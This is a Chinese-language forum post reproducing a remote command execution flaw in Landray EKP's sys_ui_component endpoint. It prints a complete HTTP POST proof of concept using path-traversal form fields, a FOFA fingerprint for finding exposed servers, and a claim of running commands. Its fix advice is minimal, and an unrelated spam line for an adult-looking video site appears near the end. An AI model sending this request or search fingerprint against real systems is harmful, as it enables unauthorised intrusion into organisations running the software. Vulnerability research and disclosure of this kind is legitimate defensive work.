&

2024HW 藍(lán)凌 ekp sys_ui_component 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

當(dāng)前位置：點(diǎn)晴教程→知識(shí)管理交流 →『技術(shù)文檔交流』

admin

2024年8月22日 18:56 本文熱度 334

免責(zé)聲明

請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試，由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，作者不為此承擔(dān)任何責(zé)任。工具來自網(wǎng)絡(luò)，安全性自測，如有侵權(quán)請(qǐng)聯(lián)系刪除。

0x01漏洞描述

藍(lán)凌 EKP sys_ui_component 遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可通過此漏洞上傳惡意腳本文件，對(duì)服務(wù)器的正常運(yùn)行造成安全威脅。

0x02漏洞復(fù)現(xiàn)

POC如下所示：POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequestContent-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--

exp：

后臺(tái)回復(fù)："藍(lán)凌exp" 獲取

0x03 復(fù)現(xiàn)過程

fofa：icon_hash="831854882"

頁面是這個(gè)樣子的：

使用poc：

執(zhí)行命令dir：

0x04?修復(fù)建議

1、請(qǐng)聯(lián)系廠商進(jìn)行修復(fù)。2、如非必要，禁止公網(wǎng)訪問該系統(tǒng)。3、設(shè)置白名單訪問。

END

該文章在 2024/8/24 12:22:52 編輯過

關(guān)鍵字查詢

com

遠(yuǎn)程

執(zhí)行

相關(guān)文章

正在查詢...

點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。

點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理，結(jié)合碼頭的業(yè)務(wù)特點(diǎn)，圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體，是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。

點(diǎn)晴WMS倉儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲(chǔ)管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。

點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi)，不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。

91网首页-91网页版-91网在线观看-91网站免费观看-91网站永久视频-91网站在线播放

2024HW 藍(lán)凌 ekp sys_ui_component 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)